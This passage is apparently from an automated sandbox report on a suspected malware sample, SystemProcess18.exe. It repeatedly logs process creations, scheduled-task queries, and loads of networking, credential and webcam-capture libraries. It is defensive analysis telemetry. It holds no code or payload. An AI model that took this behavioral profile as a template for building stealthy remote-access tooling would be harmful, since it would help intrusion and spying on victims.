          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Query /TN MMJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeProcess created: unknown unknownJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: oledlg.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: mfc42.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvcp60.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msv1_0.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: ntlmshared.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: cryptdll.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msimg32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: oledlg.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: mfc42.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvcp60.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: devenum.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msdmo.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Users\user\Desktop\SystemProcess18.exeSection loaded: avicap32.dllJump to behavior
